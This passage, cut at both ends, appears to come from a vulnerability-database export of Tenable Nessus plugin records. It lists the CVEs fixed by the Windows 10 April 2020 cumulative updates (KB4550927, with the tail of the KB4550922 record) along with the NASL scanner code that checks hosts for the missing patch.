Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550922');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550922])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:10:04", "description": "The remote Windows host is missing security update 4550927.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550927: Windows 10 Version 1709 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550927.NASL", "href": "https://www.tenable.com/plugins/nessus/135467", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135467);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550927\");\n script_xref(name:\"MSFT\", value:\"MS20-4550927\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550927: Windows 10 Version 1709 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550927.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)\");\n # https://support.microsoft.com/en-us/help/4550927/windows-10-update-kb4550927\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2c839d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550927.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550927');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550927])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 